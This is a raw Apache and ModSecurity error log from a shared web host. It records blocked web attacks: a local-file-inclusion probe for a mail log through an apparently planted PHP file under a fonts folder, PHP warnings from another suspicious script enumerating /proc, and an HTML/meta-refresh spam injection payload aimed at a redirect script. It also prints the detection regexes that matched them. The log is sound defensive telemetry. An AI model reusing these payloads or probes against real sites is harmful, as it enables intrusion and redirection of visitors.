[Tue May 12 06:09:40.324181 2026] [security2:error] [pid 1808852:tid 1808859] [client 216.73.216.110:54739] ModSecurity: Warning. Matched phrase "var/log/exim_paniclog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_paniclog found within ARGS:filesrc: /var/log/exim_paniclog-20260510.gz"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKoBBfeipD4uoG21Fo9UwAAAAQ"]
[Tue May 12 06:09:40.324821 2026] [security2:error] [pid 1808852:tid 1808859] [client 216.73.216.110:54739] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKoBBfeipD4uoG21Fo9UwAAAAQ"]
[Tue May 12 06:09:40.414658 2026] [security2:error] [pid 1808852:tid 1808859] [client 216.73.216.110:54739] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKoBBfeipD4uoG21Fo9UwAAAAQ"]
[Tue May 12 06:09:57.929602 2026] [security2:error] [pid 1808852:tid 1808855] [client 43.130.78.203:54484] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKoFRfeipD4uoG21Fo9ZgAAAAA"]
[Tue May 12 06:10:22.051191 2026] [core:error] [pid 1844863:tid 1844869] [client 114.119.133.220:37145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:10:22.051227 2026] [core:error] [pid 1844863:tid 1844869] [client 114.119.133.220:37145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:10:23.471601 2026] [security2:error] [pid 1825179:tid 1825215] [client 43.153.10.13:55052] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-mobilite-regional.com"] [uri "/"] [unique_id "agKoL9r1yOh9TvizezirYgAAAFE"]
[Tue May 12 06:10:25.076419 2026] [security2:error] [pid 1842385:tid 1842400] [client 43.134.127.70:50466] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/terrasse-couverte/"] [unique_id "agKoMRs7kySIUZ3ORnIzKQAAAQo"]
[Tue May 12 06:10:26.274658 2026] [security2:error] [pid 1825179:tid 1825197] [client 43.153.10.13:43544] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKoMtr1yOh9TvizezirZAAAAEA"], referer: http://pole-mobilite-regional.com
[Tue May 12 06:10:30.873599 2026] [security2:error] [pid 1842385:tid 1842409] [client 43.153.10.13:49760] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKoNhs7kySIUZ3ORnIzLgAAARI"], referer: https://www.pole-de-mobilite-regional.com/
PHP Warning:  filesize(): stat failed for /proc/1173/task/1173/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1173/task/1173/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1173/task/1173/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1173/task/1173/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1173/task/1173/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1173/task/1173/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:10:50.355788 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:50.513079 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:50.688861 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:50.845871 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:51.002802 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:51.160159 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:51.317414 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:51.474403 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:51.631310 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:51.788569 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:51.952998 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:52.113023 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:52.270005 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:52.449654 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:52.608468 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:52.765327 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:52.930632 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:53.087797 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:53.245802 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:53.436837 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:53.594214 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:53.751663 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:53.908604 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:54.065758 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:54.223956 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:54.381726 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:54.539540 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:54.696941 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:54.854451 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:55.011842 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:55.170164 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:55.327665 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:55.485219 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:55.671338 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:55.828307 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:55.985289 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:56.142416 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:56.299321 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:56.456409 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:56.613505 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:56.792072 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:56.949077 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:57.106657 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:57.263943 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:57.420960 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:57.577863 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:57.735288 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:57.892414 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:58.049949 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:58.207354 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:58.392551 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:58.549953 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:58.707342 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:58.876282 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:59.033788 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:59.191203 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:59.348617 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:59.505523 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:59.662618 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:59.833632 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:10:59.990650 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:00.148149 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:00.320921 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:00.477942 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:00.635246 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:00.792827 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:00.950304 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:01.108266 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:01.265586 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:01.422691 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:01.579713 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:01.736954 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:01.894363 2026] [:error] [pid 1844863:tid 1844870] [client 4.193.137.131:17085] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:11:34.501051 2026] [ssl:error] [pid 1844863:tid 1844885] (EAI 2)Name or service not known: [client 116.202.235.23:43288] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 06:11:34.501119 2026] [ssl:error] [pid 1844863:tid 1844885] AH01941: stapling_renew_response: responder error
[Tue May 12 06:11:34.730458 2026] [ssl:error] [pid 1844863:tid 1844889] (EAI 2)Name or service not known: [client 116.202.235.23:43290] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 06:11:34.730494 2026] [ssl:error] [pid 1844863:tid 1844889] AH01941: stapling_renew_response: responder error
[Tue May 12 06:11:34.802615 2026] [ssl:error] [pid 1820198:tid 1820205] (EAI 2)Name or service not known: [client 116.202.235.23:43292] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 06:11:34.802650 2026] [ssl:error] [pid 1820198:tid 1820205] AH01941: stapling_renew_response: responder error
[Tue May 12 06:11:34.870347 2026] [ssl:error] [pid 1842385:tid 1842394] (EAI 2)Name or service not known: [client 116.202.235.23:43300] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 06:11:34.870379 2026] [ssl:error] [pid 1842385:tid 1842394] AH01941: stapling_renew_response: responder error
[Tue May 12 06:12:13.332327 2026] [security2:error] [pid 1825179:tid 1825202] [client 43.130.102.223:58678] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/6-miniatures-extrait-2.mp3"] [unique_id "agKondr1yOh9TvizezisFgAAAEQ"]
[Tue May 12 06:13:16.860062 2026] [security2:error] [pid 1820198:tid 1820202] [client 27.78.84.116:53135] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo3M1tk6y7yBJLpJpD0wAAAII"]
[Tue May 12 06:13:16.860463 2026] [security2:error] [pid 1820198:tid 1820202] [client 27.78.84.116:53135] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh con..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo3M1tk6y7yBJLpJpD0wAAAII"]
[Tue May 12 06:13:16.860622 2026] [security2:error] [pid 1820198:tid 1820202] [client 27.78.84.116:53135] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo3M1tk6y7yBJLpJpD0wAAAII"]
[Tue May 12 06:13:16.860740 2026] [security2:error] [pid 1820198:tid 1820202] [client 27.78.84.116:53135] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo3M1tk6y7yBJLpJpD0wAAAII"]
[Tue May 12 06:13:16.860919 2026] [security2:error] [pid 1820198:tid 1820202] [client 27.78.84.116:53135] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo3M1tk6y7yBJLpJpD0wAAAII"]
[Tue May 12 06:13:16.861349 2026] [security2:error] [pid 1820198:tid 1820202] [client 27.78.84.116:53135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo3M1tk6y7yBJLpJpD0wAAAII"]
